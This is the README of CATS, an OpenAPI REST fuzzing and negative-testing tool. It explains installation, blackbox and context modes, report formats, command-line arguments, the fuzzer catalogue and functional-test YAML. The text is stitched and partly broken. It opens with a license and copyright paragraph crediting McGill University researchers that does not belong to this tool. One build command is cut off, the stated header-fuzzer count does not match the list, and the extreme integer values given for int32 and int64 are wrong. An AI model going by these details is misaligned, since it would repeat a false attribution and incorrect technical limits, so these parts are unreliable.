The software was developed by Steven H. H. Ding, Miles Q. Li, and Benjamin C. M. Fung in the McGill Data Mining and Security Lab and Queen's L1NNA Research Laboratory in Canada. It is distributed under the Apache License Version 2.0. Please refer to LICENSE.txt for details.

Copyright 2014-2021 McGill University and the Researchers. All rights reserved.



CATS - REST API Fuzzer And Negative Testing Tool For OpenAPI Endpoints


REST API fuzzer and negative testing tool. Run thousands of self-healing API tests within minutes with no coding effort!

  • Comprehensive: tests are generated automatically based on a large number of scenarios and cover every field and header
  • Intelligent: tests are generated based on data types and constraints; each Fuzzer has specific expectations depending on the scenario under test
  • Highly Configurable: high amount of customization: you can exclude specific Fuzzers, HTTP response codes, provide business context and a lot more
  • Self-Healing: as tests are generated, any OpenAPI spec change is picked up automatically
  • Simple to Learn: flat learning curve, with intuitive configuration and syntax
  • Fast: automatic process for write, run and report tests which covers thousands of scenarios within minutes

Overview

By using a simple and minimal syntax, with a flat learning curve, CATS (Contract Auto-generated Tests for Swagger) enables you to generate thousands of API tests within minutes with no coding effort. All tests are generated, run and reported automatically based on a pre-defined set of 89 Fuzzers. The Fuzzers cover a wide range of input data from fully random large Unicode values to well crafted, context dependant values based on the request data types and constraints. Even more, you can leverage the fact that CATS generates request payloads dynamically and write simple end-to-end functional tests.


Please check the Slicing Strategies section for making CATS run fast and comprehensive at the same time.

Tutorials on how to use CATS

This is a list of articles with step-by-step guides on how to use CATS:

Some bugs found by CATS

Installation

Homebrew

> brew tap endava/tap
> brew install cats

Manual

CATS is bundled both as an executable JAR and as a native binary. The native binaries do not need Java installed.

After downloading the native binary for your OS, you can add it to your PATH so that you can execute it like any other command line tool:

sudo cp cats /usr/local/bin/cats

You can also get autocomplete by downloading the cats_autocomplete script and do:

source cats_autocomplete

To get persistent autocomplete, add the above line to ~/.zshrc or ~/.bashrc, but make sure you put the fully qualified path for the cats_autocomplete script.

You can also check the cats_autocomplete source for alternative setup.

There is no native binary for Windows, but you can use the uberjar version. This requires Java 11+ to be installed.

You can run it as java -jar cats.jar.

Head to the releases page to download the latest versions: https://github.com/Endava/cats/releases.

Build

You can build CATS from sources on your local box. You need Java 11+. Maven is already bundled.

Before running the first build, please make sure you do a ./mvnw clean. CATS uses a fork of OKHttpClient which will install locally under the 4.9.1-CATS version, so don't worry about overriding the official versions.

You can use the following Maven command to build the project:

./mvnw package -Dquarkus.package.type=uber-jar

cp target/

You will end up with a cats.jar in the target folder. You can run it with java -jar cats.jar ....

You can also build native images using a GraalVM Java version.

./mvnw package -Pnative

Note: You will need to configure Maven with a Github PAT with read-packages scope to get some dependencies for the build.

Notes on Unit Tests

You may see some ERROR log messages while running the Unit Tests. Those are expected behaviour for testing the negative scenarios of the Fuzzers.

Running CATS

Blackbox mode

Blackbox mode means that CATS doesn't need any specific context. You just need to provide the service URL, the OpenAPI spec and most probably authentication headers.

> cats --contract=openapi.yaml --server=http://localhost:8080 --headers=headers.yml --blackbox

In blackbox mode CATS will only report ERRORs if the received HTTP response code is a 5XX. Any other mismatch between what the Fuzzer expects and what the service returns (for example the Fuzzer expects a 400 and the service returns a 200) will be ignored.

The blackbox mode is similar to a smoke test. It will quickly tell you if the application has major bugs that must be addressed immediately.

Context mode

The real power of CATS relies on running it in a non-blackbox mode also called context mode. Each Fuzzer has an expected HTTP response code based on the scenario under test and will also check if the response is matching the schema defined in the OpenAPI spec specific to that response code. This will allow you to tweak either your OpenAPI spec or service behaviour in order to create good quality APIs and documentation and also to avoid possible serious bugs.

Running CATS in context mode usually implies providing it a --refData file with resource identifiers specific to the business logic. CATS cannot create data on its own (yet), so any entities/resources required by request fields or query params must be created in advance and added to the reference data file.

> cats --contract=openapi.yaml --server=http://localhost:8080 --headers=headers.yml --refData=referenceData.yml

Notes on skipped Tests

You may notice a significant number of tests marked as skipped. CATS will try to apply all Fuzzers to all fields, but this is not always possible. For example the BooleanFieldsFuzzer cannot be applied to String fields. This is why that test attempt will be marked as skipped. It was an intentional decision to also report the skipped tests in order to show that CATS actually tries all the Fuzzers on all the fields/paths/endpoints.

Additionally, CATS supports a lot more arguments that allow you to restrict the number of fuzzers, provide timeouts, limit the number of requests per minute and so on.

Understanding how CATS works and reports results

CATS generates tests based on configured Fuzzers. Each Fuzzer has a specific scenario and a specific expected result. The CATS engine will run the scenario, get the result from the service and match it with the Fuzzer expected result. Depending on the matching outcome, CATS will report as follows:

  • INFO/SUCCESS is expected and documented behaviour. No need for action.
  • WARN is expected but undocumented behaviour or some misalignment between the contract and the service. This will ideally be actioned.
  • ERROR is abnormal/unexpected behaviour. This must be actioned.

CATS will iterate through all endpoints, all HTTP methods and all the associated requests bodies and parameters (including multiple combinations when dealing with oneOf/anyOf elements) and fuzz their values considering their defined data type and constraints. The actual fuzzing depends on the specific Fuzzer executed. Please see the list of fuzzers and their behaviour. There are also differences on how the fuzzing works depending on the HTTP method:

  • for methods with request bodies like POST, PUT the fuzzing will be applied at the request body data models level
  • for methods without request bodies like GET, DELETE the fuzzing will be applied at the URL parameters level

This means that for methods with request bodies (POST,PUT) that have also URL/path parameters, you need to supply the path parameters via urlParams or the referenceData file as failure to do so will result in Illegal character in path at index ... errors.

Interpreting Results

HTML_JS

HTML_JS is the default report produced by CATS. The execution report is placed in a folder called cats-report/TIMESTAMP or cats-report depending on the --timestampReports argument. The folder will be created inside the current folder (if it doesn't exist) and for each run a new subfolder will be created with the TIMESTAMP value when the run started. This allows you to have a history of the runs. The report itself is in the index.html file, where you can:

  • filter test runs based on the result: All, Success, Warn and Error
  • filter based on the Fuzzer so that you can only see the runs for that specific Fuzzer
  • see summary with all the tests with their corresponding path against they were run, and the result
  • have ability to click on any tests and get details about the Scenario being executed, Expected Result, Actual result as well as request/response details

Along with the summary from index.html each individual test will have a specific TestXXX.html page with more details, as well as a json version of the test which can be later replayed using > cats replay TestXXX.json.

Understanding the Result Reason values:

  • Unexpected Exception - reported as error; this might indicate a possible bug in the service or a corner case that is not handled correctly by CATS
  • Not Matching Response Schema - reported as a warn; this indicates that the service returns an expected response code and a response body, but the response body does not match the schema defined in the contract
  • Undocumented Response Code - reported as a warn; this indicates that the service returns an expected response code, but the response code is not documented in the contract
  • Unexpected Response Code - reported as an error; this indicates a possible bug in the service - the response code is documented, but is not expected for this scenario
  • Unexpected Behaviour - reported as an error; this indicates a possible bug in the service - the response code is neither documented nor expected for this scenario
  • Not Found - reported as an error in order to force providing more context; this indicates that CATS needs additional business context in order to run successfully - you can do this using the --refData and/or --urlParams arguments

This is the summary page:


And this is what you get when you click on a specific test:



HTML_ONLY

This format is similar to HTML_JS, but you cannot do any filtering or sorting.

JUNIT

CATS also supports JUNIT output. The output will be a single testsuite that will incorporate all tests grouped by Fuzzer name. As the JUNIT format does not have the concept of a warning, the following mapping is used:

  • CATS error is reported as JUNIT error
  • JUNIT failure is not used at all
  • CATS warn is reported as JUNIT skipped
  • CATS skipped is reported as JUNIT disabled

The JUNIT report is written as junit.xml in the cats-report folder. Individual tests, both as .html and .json will also be created.

Slicing Strategies for Running Cats

CATS has a significant number of Fuzzers. Currently, 89 and growing. Some of the Fuzzers are executing multiple tests for every given field within the request. For example the ControlCharsOnlyInFieldsFuzzer has 63 control chars values that will be tried for each request field. If a request has 15 fields for example, this will result in 1020 tests. Considering that there are additional Fuzzers with the same magnitude of tests being generated, you can easily get to 20k tests being executed on a typical run. This will result in huge reports and long run times (i.e. minutes, rather than seconds).

Below are some recommended strategies on how you can separate the tests in chunks which can be executed as stages in a deployment pipeline, one after the other.

Split by Endpoints

You can use the --paths=PATH argument to run CATS sequentially for each path.

Split by Fuzzer Category

You can use the --checkXXX arguments to run CATS only with specific Fuzzers like: --checkHttp, --checkFields, etc.

Split by Fuzzer Type

You can use various arguments like --fuzzers=Fuzzer1,Fuzzer2 or --skipFuzzers=Fuzzer1,Fuzzer2 to either include or exclude specific Fuzzers. For example, you can run all Fuzzers except for the ControlChars and Whitespaces ones like this: --skipFuzzers=ControlChars,Whitespaces. This will skip all Fuzzers containing these strings in their name. Afterwards, you can create an additional run only with these Fuzzers: --fuzzers=ControlChars,Whitespaces.

These are just some recommendations on how you can split the types of tests cases. Depending on how complex your API is, you might go with a combination of the above or with even more granular splits.

Please note that because ControlChars, Emojis and Whitespaces generate a huge number of tests even for small OpenAPI contracts, they are disabled by default. You can enable them using the --includeControlChars, --includeWhitespaces and/or --includeEmojis arguments. The recommendation is to run them in separate runs so that you get manageable reports and optimal running times.

Ignoring Specific HTTP Responses

By default, CATS will report WARNs and ERRORs according to the specific behaviour of each Fuzzer. There are cases though when you might want to focus only on critical bugs. You can use the --ignoreResponseXXX arguments to supply a list of response codes, response sizes, word counts, line counts or response body regexes that should be ignored as issues (overriding the Fuzzer behaviour) and reported as success instead of WARN or ERROR. For example, if you want CATS to report ERRORs only when there is an Exception or the service returns a 500, you can use this: --ignoreResponseCodes="2xx,4xx".

Ignoring Undocumented Response Code Checks

You can also choose to ignore checks done by the Fuzzers. By default, each Fuzzer has an expected response code based on the scenario under test, and will report a WARN if the service returns the expected response code but that response code is not documented inside the contract. You can make CATS ignore the undocumented response code checks (i.e. checking for the expected response code inside the contract) using the --ignoreResponseCodeUndocumentedCheck argument. CATS will now report these cases as SUCCESS instead of WARN.

Ignoring Response Body Checks

Additionally, you can also choose to ignore the response body checks. By default, on top of checking the expected response code, each Fuzzer will check if the response body matches what is defined in the contract and will report a WARN if it does not match. You can make CATS ignore the response body checks using the --ignoreResponseBodyCheck argument. CATS will now report these cases as SUCCESS instead of WARN.

Replaying Tests

When CATS runs, for each test, it will export both an HTML file that will be linked in the final report and individual JSON files. The JSON files can be used to replay that test. When replaying a test (or a list of tests), CATS won't produce any report. The output will be solely available in the console. This is useful when you want to see the exact behaviour of the specific test or attach it in a bug report for example.

The syntax for replaying tests is the following:

> cats replay "Test1,Test233,Test15.json,dir/Test19.json"

Some notes on the above example:

  • test names can be separated by comma ,
  • if you provide a json extension to a test name, that file will be searched as a path, i.e. it will search for Test15.json in the current folder and Test19.json in the dir folder
  • if you don't provide a json extension to a test name, it will search for that test in the cats-report folder i.e. cats-report/Test1.json and cats-report/Test233.json

Available Commands

To list all available commands, run:

> cats -h

All available subcommands are listed below:

  • > cats help or cats -h will list all available options

  • > cats list --fuzzers will list all the existing fuzzers, grouped on categories

  • > cats list --fieldsFuzzingStrategy will list all the available fields fuzzing strategies

  • > cats list --paths --contract=CONTRACT will list all the paths available within the contract

  • > cats replay "test1,test2" will replay the given tests test1 and test2

  • > cats fuzz will fuzz based on a given request template, rather than an OpenAPI contract

  • > cats run will run functional and targeted security tests written in the CATS YAML format

  • > cats lint will run OpenAPI contract linters, also called ContractInfoFuzzers

Available arguments

  • --contract=LOCATION_OF_THE_CONTRACT supplies the location of the OpenApi or Swagger contract.
  • --server=URL supplies the URL of the service implementing the contract.
  • --basicauth=USR:PWD supplies a username:password pair, in case the service uses basic auth.
  • --fuzzers=LIST_OF_FUZZERS supplies a comma separated list of fuzzers. The supplied list of Fuzzers can be partial names, not full Fuzzer names. CATS will check for all Fuzzers containing the supplied strings. If the argument is not supplied, all fuzzers will be run.
  • --log=PACKAGE:LEVEL can configure custom log level for a given package. You can provide a comma separated list of packages and levels. This is helpful when you want to see full HTTP traffic: --log=org.apache.http.wire:debug or suppress CATS logging: --log=com.endava.cats:warn
  • --paths=PATH_LIST supplies a comma separated list of OpenApi paths to be tested. If no path is supplied, all paths will be considered.
  • --skipPaths=PATH_LIST a comma separated list of paths to ignore. If no path is supplied, no path will be ignored
  • --fieldsFuzzingStrategy=STRATEGY specifies which strategy will be used for field fuzzing. Available strategies are ONEBYONE, SIZE and POWERSET. More information on field fuzzing can be found in the sections below.
  • --maxFieldsToRemove=NUMBER specifies the maximum number of fields to be removed when using the SIZE fields fuzzing strategy.
  • --refData=FILE specifies the file containing static reference data which must be fixed in order to have valid business requests. This is a YAML file. It is explained further in the sections below.
  • --headers=FILE specifies a file containing headers that will be added when sending payloads to the endpoints. You can use this option to add oauth/JWT tokens for example.
  • --edgeSpacesStrategy=STRATEGY specifies how to expect the server to behave when sending trailing and prefix spaces within fields. Possible values are trimAndValidate and validateAndTrim.
  • --sanitizationStrategy=STRATEGY specifies how to expect the server to behave when sending Unicode Control Chars and Unicode Other Symbols within the fields. Possible values are sanitizeAndValidate and validateAndSanitize
  • --urlParams A comma separated list of 'name:value' pairs of parameters to be replaced inside the URLs. This is useful when you have static parameters in URLs (like 'version' for example).
  • --functionalFuzzerFile a file used by the FunctionalFuzzer that will be used to create user-supplied payloads.
  • --skipFuzzers=LIST_OF_FUZZERS a comma separated list of fuzzers that will be skipped for all paths. You can either provide full Fuzzer names (for example: --skipFuzzers=VeryLargeStringsFuzzer) or partial Fuzzer names (for example: --skipFuzzers=VeryLarge). CATS will check if the Fuzzer names contain the string you provide in the argument's value.
  • --skipFields=field1,field2#subField1 a comma separated list of fields that will be skipped by replacement Fuzzers like EmptyStringsInFields, NullValuesInFields, etc.
  • --httpMethods=PUT,POST,etc a comma separated list of HTTP methods that will be used to filter which http methods will be executed for each path within the contract
  • --securityFuzzerFile A file used by the SecurityFuzzer that will be used to inject special strings in order to exploit possible vulnerabilities
  • --printExecutionStatistics If supplied (no value needed), prints a summary of execution times for each endpoint and HTTP method. By default this will print a summary for each endpoint: max, min and average. If you want detailed reports you must supply --printExecutionStatistics=detailed
  • --timestampReports If supplied (no value needed), it will output the report still inside the cats-report folder, but in a sub-folder with the current timestamp
  • --reportFormat=FORMAT Specifies the format of the CATS report. Supported formats: HTML_ONLY, HTML_JS or JUNIT. You can use HTML_ONLY if you want the report to not contain any Javascript. This is useful in CI environments due to Javascript content security policies. Default is HTML_JS which includes some sorting and filtering capabilities.
  • --useExamples If true (default value when not supplied) then CATS will use examples supplied in the OpenAPI contract. If false CATS will rely only on generated values
  • --checkFields If supplied (no value needed), it will only run the Field Fuzzers
  • --checkHeaders If supplied (no value needed), it will only run the Header Fuzzers
  • --checkHttp If supplied (no value needed), it will only run the HTTP Fuzzers
  • --includeWhitespaces If supplied (no value needed), it will include the Whitespaces Fuzzers
  • --includeEmojis If supplied (no value needed), it will include the Emojis Fuzzers
  • --includeControlChars If supplied (no value needed), it will include the ControlChars Fuzzers
  • --includeContract If supplied (no value needed), it will include ContractInfoFuzzers
  • --sslKeystore Location of the JKS keystore holding certificates used when authenticating calls using one-way or two-way SSL
  • --sslKeystorePwd The password of the sslKeystore
  • --sslKeyPwd The password of the private key from the sslKeystore
  • --proxyHost The proxy server's host name (if running behind proxy)
  • --proxyPort The proxy server's port number (if running behind proxy)
  • --maxRequestsPerMinute Maximum number of requests per minute; this is useful when APIs have rate limiting implemented; default is 10000
  • --connectionTimeout Time period in seconds which CATS should establish a connection with the server; default is 10 seconds
  • --writeTimeout Maximum time of inactivity in seconds between two data packets when sending the request to the server; default is 10 seconds
  • --readTimeout Maximum time of inactivity in seconds between two data packets when waiting for the server's response; default is 10 seconds
  • --dryRun If provided, it will simulate a run of the service with the supplied configuration. The run won't produce a report, but will show how many tests will be generated and run for each OpenAPI endpoint
  • --ignoreResponseCodes HTTP_CODES_LIST a comma separated list of HTTP response codes that will be considered as SUCCESS, even if the Fuzzer will typically report it as WARN or ERROR. You can use response code families as 2xx, 4xx, etc. If provided, all Contract Fuzzers will be skipped.
  • --ignoreResponseSize SIZE_LIST a comma separated list of response sizes that will be considered as SUCCESS, even if the Fuzzer will typically report it as WARN or ERROR
  • --ignoreResponseWords COUNT_LIST a comma separated list of words count in the response that will be considered as SUCCESS, even if the Fuzzer will typically report it as WARN or ERROR
  • --ignoreResponseLines LINES_COUNT a comma separated list of lines count in the response that will be considered as SUCCESS, even if the Fuzzer will typically report it as WARN or ERROR
  • --ignoreResponseRegex a REGEX that will match against the response that will be considered as SUCCESS, even if the Fuzzer will typically report it as WARN or ERROR
  • --tests TESTS_LIST a comma separated list of executed tests in JSON format from the cats-report folder. If you supply the list without the .json extension CATS will search the test in the cats-report folder
  • --ignoreResponseCodeUndocumentedCheck If supplied (no value needed) it won't check if the response code received from the service matches the value expected by the fuzzer and will return the test result as SUCCESS instead of WARN
  • --ignoreResponseBodyCheck If supplied (no value needed) it won't check if the response body received from the service matches the schema supplied inside the contract and will return the test result as SUCCESS instead of WARN
  • --blackbox If supplied (no value needed) it will ignore all response codes except for 5XX which will be returned as ERROR. This is similar to --ignoreResponseCodes="2xx,4xx"
  • --contentType A custom mime type if the OpenAPI spec uses content type negotiation versioning.
  • --output The path where the CATS report will be written. Default is cats-report in the current directory
  • --skipReportingForIgnoredCodes Skip reporting entirely for any of the ignored values provided via the --ignoreResponseXXX arguments
> cats --contract=my.yml --server=http://localhost:8080 --checkHeaders

This will run CATS against http://localhost:8080 using my.yml as an API spec and will only run the Header Fuzzers.

Available Fuzzers

To get a list of fuzzers run cats list --fuzzers. A list of all available fuzzers will be returned, along with a short description for each.

There are multiple categories of Fuzzers available:

  • Field Fuzzers which target request body fields or path parameters
  • Header Fuzzers which target HTTP headers
  • HTTP Fuzzers which target just the interaction with the service (without fuzzing fields or headers)

Additional checks which are not actually using any fuzzing, but leverage the CATS internal model of running the tests as Fuzzers:

  • ContractInfo Fuzzers which check the contract for API good practices
  • Special Fuzzers a special category which needs further configuration and is focused on more complex activities like functional flow, security testing or supplying your own request templates, rather than OpenAPI specs

Field Fuzzers

CATS currently has 42 registered Field Fuzzers:

  • BooleanFieldsFuzzer - iterate through each Boolean field and send random strings in the targeted field
  • DecimalFieldsLeftBoundaryFuzzer - iterate through each Number field (either float or double) and send requests with outside the range values on the left side in the targeted field
  • DecimalFieldsRightBoundaryFuzzer - iterate through each Number field (either float or double) and send requests with outside the range values on the right side in the targeted field
  • DecimalValuesInIntegerFieldsFuzzer - iterate through each Integer field and send requests with decimal values in the targeted field
  • EmptyStringValuesInFieldsFuzzer - iterate through each field and send requests with empty String values in the targeted field
  • ExtremeNegativeValueDecimalFieldsFuzzer - iterate through each Number field and send requests with the lowest value possible (-999999999999999999999999999999999999999999.99999999999 for no format, -3.4028235E38 for float and -1.7976931348623157E308 for double) in the targeted field
  • ExtremeNegativeValueIntegerFieldsFuzzer - iterate through each Integer field and send requests with the lowest value possible (-9223372036854775808 for int32 and -18446744073709551616 for int64) in the targeted field
  • ExtremePositiveValueDecimalFieldsFuzzer - iterate through each Number field and send requests with the highest value possible (999999999999999999999999999999999999999999.99999999999 for no format, 3.4028235E38 for float and 1.7976931348623157E308 for double) in the targeted field
  • ExtremePositiveValueInIntegerFieldsFuzzer - iterate through each Integer field and send requests with the highest value possible (9223372036854775807 for int32 and 18446744073709551614 for int64) in the targeted field
  • IntegerFieldsLeftBoundaryFuzzer - iterate through each Integer field and send requests with outside the range values on the left side in the targeted field
  • IntegerFieldsRightBoundaryFuzzer - iterate through each Integer field and send requests with outside the range values on the right side in the targeted field
  • InvalidValuesInEnumsFieldsFuzzer - iterate through each ENUM field and send invalid values
  • LeadingWhitespacesInFieldsTrimValidateFuzzer - iterate through each field and send requests with Unicode whitespaces and invisible separators prefixing the current value in the targeted field
  • LeadingControlCharsInFieldsTrimValidateFuzzer - iterate through each field and send requests with Unicode control chars prefixing the current value in the targeted field
  • LeadingSingleCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values prefixed with single code points emojis
  • LeadingMultiCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values prefixed with multi code points emojis
  • MaxLengthExactValuesInStringFieldsFuzzer - iterate through each String field that has maxLength declared and send requests with values matching the maxLength size/value in the targeted field
  • MaximumExactValuesInNumericFieldsFuzzer - iterate through each Number and Integer field that has maximum declared and send requests with values matching the maximum size/value in the targeted field
  • MinLengthExactValuesInStringFieldsFuzzer - iterate through each String field that has minLength declared and send requests with values matching the minLength size/value in the targeted field
  • MinimumExactValuesInNumericFieldsFuzzer - iterate through each Number and Integer field that has minimum declared and send requests with values matching the minimum size/value in the targeted field
  • NewFieldsFuzzer - send a 'happy' flow request and add a new field inside the request called 'catsFuzzyField'
  • NullValuesInFieldsFuzzer - iterate through each field and send requests with null values in the targeted field
  • OnlyControlCharsInFieldsTrimValidateFuzzer - iterate through each field and send values with control chars only
  • OnlyWhitespacesInFieldsTrimValidateFuzzer - iterate through each field and send values with unicode separators only
  • OnlySingleCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values with single code point emojis only
  • OnlyMultiCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values with multi code point emojis only
  • RemoveFieldsFuzzer - iterate through each request fields and remove certain fields according to the supplied 'fieldsFuzzingStrategy'
  • StringFieldsLeftBoundaryFuzzer - iterate through each String field and send requests with outside the range values on the left side in the targeted field
  • StringFieldsRightBoundaryFuzzer - iterate through each String field and send requests with outside the range values on the right side in the targeted field
  • StringFormatAlmostValidValuesFuzzer - iterate through each String field and get its 'format' value (i.e. email, ip, uuid, date, datetime, etc); send requests with values which are almost valid (i.e. email@yhoo. for email, 888.1.1. for ip, etc) in the targeted field
  • StringFormatTotallyWrongValuesFuzzer - iterate through each String field and get its 'format' value (i.e. email, ip, uuid, date, datetime, etc); send requests with values which are totally wrong (i.e. abcd for email, 1244. for ip, etc) in the targeted field
  • StringsInNumericFieldsFuzzer - iterate through each Integer (int, long) and Number field (float, double) and send requests having the fuzz string value in the targeted field
  • TrailingWhitespacesInFieldsTrimValidateFuzzer - iterate through each field and send requests with values trailed by Unicode whitespaces and invisible separators in the targeted field
  • TrailingControlCharsInFieldsTrimValidateFuzzer - iterate through each field and send requests with values trailed by Unicode control chars in the targeted field
  • TrailingSingleCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values trailed with single code point emojis
  • TrailingMultiCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values trailed with multi code point emojis
  • VeryLargeStringsFuzzer - iterate through each String field and send requests with very large values (40000 characters) in the targeted field
  • WithinControlCharsInFieldsSanitizeValidateFuzzer - iterate through each field and send values containing unicode control chars
  • WithinSingleCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values containing single code point emojis
  • WithinMultiCodePointEmojisInFieldsTrimValidateFuzzer - iterate through each field and send values containing multi code point emojis
  • ZalgoTextInStringFieldsValidateSanitizeFuzzer - iterate through each field and send values containing zalgo text

You can run only these Fuzzers by supplying the --checkFields argument.
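
For example, assuming the same my.yml contract used earlier, a run limited to the Field Fuzzers might look like:

> cats --contract=my.yml --server=http://localhost:8080 --checkFields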

Header Fuzzers

CATS currently has 28 registered Header Fuzzers:

  • AbugidasCharsInHeadersFuzzer - iterate through each header and send requests with abugidas chars in the targeted header
  • CheckSecurityHeadersFuzzer - check all responses for good practices around Security related headers like: [{name=Cache-Control, value=no-store}, {name=X-XSS-Protection, value=1; mode=block}, {name=X-Content-Type-Options, value=nosniff}, {name=X-Frame-Options, value=DENY}]
  • DummyAcceptHeadersFuzzer - send a request with a dummy Accept header and expect to get 406 code
  • DummyContentTypeHeadersFuzzer - send a request with a dummy Content-Type header and expect to get 415 code
  • DuplicateHeaderFuzzer - send a 'happy' flow request and duplicate an existing header
  • EmptyStringValuesInHeadersFuzzer - iterate through each header and send requests with empty String values in the targeted header
  • ExtraHeaderFuzzer - send a 'happy' flow request and add an extra field inside the request called 'Cats-Fuzzy-Header'
  • LargeValuesInHeadersFuzzer - iterate through each header and send requests with large values in the targeted header
  • LeadingControlCharsInHeadersFuzzer - iterate through each header and prefix values with control chars
  • LeadingWhitespacesInHeadersFuzzer - iterate through each header and prefix value with unicode separators
  • LeadingSpacesInHeadersFuzzer - iterate through each header and send requests with spaces prefixing the value in the targeted header
  • RemoveHeadersFuzzer - iterate through each header and remove different combinations of them
  • OnlyControlCharsInHeadersFuzzer - iterate through each header and replace value with control chars
  • OnlySpacesInHeadersFuzzer - iterate through each header and replace value with spaces
  • OnlyWhitespacesInHeadersFuzzer - iterate through each header and replace value with unicode separators
  • TrailingSpacesInHeadersFuzzer - iterate through each header and send requests with trailing spaces in the targeted header
  • TrailingControlCharsInHeadersFuzzer - iterate through each header and trail values with control chars
  • TrailingWhitespacesInHeadersFuzzer - iterate through each header and trail values with unicode separators
  • UnsupportedAcceptHeadersFuzzer - send a request with an unsupported Accept header and expect to get 406 code
  • UnsupportedContentTypesHeadersFuzzer - send a request with an unsupported Content-Type header and expect to get 415 code
  • ZalgoTextInHeadersFuzzer - iterate through each header and send requests with zalgo text in the targeted header

You can run only these Fuzzers by supplying the --checkHeaders argument.

HTTP Fuzzers

CATS currently has 6 registered HTTP Fuzzers:

  • BypassAuthenticationFuzzer - check if an authentication header is supplied; if yes try to make requests without it
  • DummyRequestFuzzer - send a dummy json request {'cats': 'cats'}
  • HappyFuzzer - send a request with all fields and headers populated
  • HttpMethodsFuzzer - iterate through each undocumented HTTP method and send an empty request
  • MalformedJsonFuzzer - send a malformed json request which has the String 'bla' at the end
  • NonRestHttpMethodsFuzzer - iterate through a list of HTTP methods specific to the WebDAV protocol that are not expected to be implemented by REST APIs

You can run only these Fuzzers by supplying the --checkHttp argument.

ContractInfo Fuzzers or OpenAPI Linters

Usually a good OpenAPI contract must follow several good practices in order to make it easily digestible by the service clients and act as much as possible as self-sufficient documentation:

  • follow good practices around naming the contract elements like paths, requests, responses
  • always use plural for the path names, separate path words through hyphens/underscores, use camelCase or snake_case for any json types and properties
  • provide tags for all operations in order to avoid breaking code generation on some languages and have a logical grouping of the API operations
  • provide good description for all paths, methods and request/response elements
  • provide meaningful responses for POST, PATCH and PUT requests
  • provide examples for all requests/response elements
  • provide structural constraints for (ideally) all request/response properties (min, max, regex)
  • have some sort of CorrelationIds/TraceIds within headers
  • have at least a security schema in place
  • avoid having the API version part of the paths
  • document response codes for both "happy" and "unhappy" flows
  • avoid using xml payload unless there is a really good reason (like documenting an old API for example)
  • json types and properties do not use the same naming (like having a Pet with a property named pet)

CATS currently has 9 registered ContractInfo Fuzzers:

  • HttpStatusCodeInValidRangeFuzzer - verifies that all HTTP response codes are within the range of 100 to 599
  • NamingsContractInfoFuzzer - verifies that all OpenAPI contract elements follow REST API naming good practices
  • PathTagsContractInfoFuzzer - verifies that all OpenAPI paths contain tags elements and checks if the tags elements match the ones declared at the top level
  • RecommendedHeadersContractInfoFuzzer - verifies that all OpenAPI contract paths contain recommended headers like: CorrelationId/TraceId, etc.
  • RecommendedHttpCodesContractInfoFuzzer - verifies that the current path contains all recommended HTTP response codes for all operations
  • SecuritySchemesContractInfoFuzzer - verifies if the OpenApi contract contains valid security schemas for all paths, either globally configured or per path
  • TopLevelElementsContractInfoFuzzer - verifies that all OpenAPI contract level elements are present and provide meaningful information: API description, documentation, title, version, etc.
  • VersionsContractInfoFuzzer - verifies that a given path doesn't contain versioning information
  • XmlContentTypeContractInfoFuzzer - verifies that all OpenAPI contract paths responses and requests do not offer application/xml as a Content-Type

You can run only these Fuzzers using > cats lint --contract=CONTRACT.

Special Fuzzers

FunctionalFuzzer

Writing Custom Tests

You can leverage CATS super-powers of self-healing and payload generation in order to write functional tests. This is achieved using the so called FunctionalFuzzer, which is not a Fuzzer per se, but was named as such for consistency. The functional tests are written in a YAML file using a simple DSL. The DSL supports adding identifiers, descriptions, assertions as well as passing variables between tests. The cool thing is that, by leveraging the fact that CATS generates valid payloads, you only need to override values for specific fields. The rest of the information will be populated by CATS using valid data, just like a 'happy' flow request.

It's important to note that reference data won't get replaced when using the FunctionalFuzzer. So if there are reference data fields, you must also supply those in the FunctionalFuzzer.

The FunctionalFuzzer will only trigger if a valid functionalFuzzer.yml file is supplied. The file has the following syntax:

/path:
  testNumber:
    description: Short description of the test
    prop: value
    prop#subprop: value
    prop7:
      - value1
      - value2
      - value3
    oneOfSelection:
      element#type: "Value"
    expectedResponseCode: HTTP_CODE
    httpMethod: HTTP_METHOD

And a typical run will look like:

> cats run functionalFuzzer.yml -c contract.yml -s http://localhost:8080

This is a description of the elements within the functionalFuzzer.yml file:

  • you can supply a description of the test. This will be set as the Scenario description. If you don't supply a description the testNumber will be used instead.
  • you can have multiple tests under the same path: test1, test2, etc.
  • expectedResponseCode is mandatory, otherwise the Fuzzer will ignore this test. The expectedResponseCode tells CATS what to expect from the service when sending this test.
  • at most one of the properties can have multiple values. When this situation happens, that test will actually become a list of tests, one for each of the values supplied. For example, in the above example prop7 has 3 values. This will actually result in 3 tests, one for each value.
  • tests within the file are executed in the declared order. This is why you can have outputs from one test act as inputs for the next one(s) (see the next section for details).
  • if the supplied httpMethod doesn't exist in the OpenAPI given path, a warning will be issued and no test will be executed
  • if the supplied httpMethod is not a valid HTTP method, a warning will be issued and no test will be executed
  • if the request payload uses a oneOf element to allow multiple request types, you can control which of the possible types the FunctionalFuzzer will apply to using the oneOfSelection keyword. The value of the oneOfSelection keyword must match the fully qualified name of the discriminator.
  • if no oneOfSelection is supplied, and the request payload accepts multiple oneOf elements, then a custom test will be created for each type of payload
  • the file uses Json path syntax for all the properties you can supply; you can separate elements through # as in the example above, instead of '.'

Dealing with oneOf, anyOf

When you have request payloads which can take multiple object types, you can use the oneOfSelection keyword to specify which of the possible object types is required by the FunctionalFuzzer. If you don't provide this element, all combinations will be considered. If you supply a value, this must be exactly the one used in the discriminator.

Correlating Tests

As CATS mostly relies on generated data with small help from some reference data, testing complex business scenarios with the pre-defined Fuzzers is not possible. Suppose we have an endpoint that creates data (doing a POST), and we want to check its existence (via GET). We need a way to get some identifier from the POST call and send it to the GET call. This is now possible using the FunctionalFuzzer. The functionalFuzzerFile can have an output entry where you can state a variable name, and its fully qualified name from the response in order to set its value. You can then refer to the variable using ${variable_name} from another test in order to use its value.

Here is an example:

/pet:
  test_1:
    description: Create a Pet
    httpMethod: POST
    name: "My Pet"
    expectedResponseCode: 200
    output:
      petId: pet#id
/pet/{id}:
  test_2:
    description: Get a Pet
    id: ${petId}
    expectedResponseCode: 200

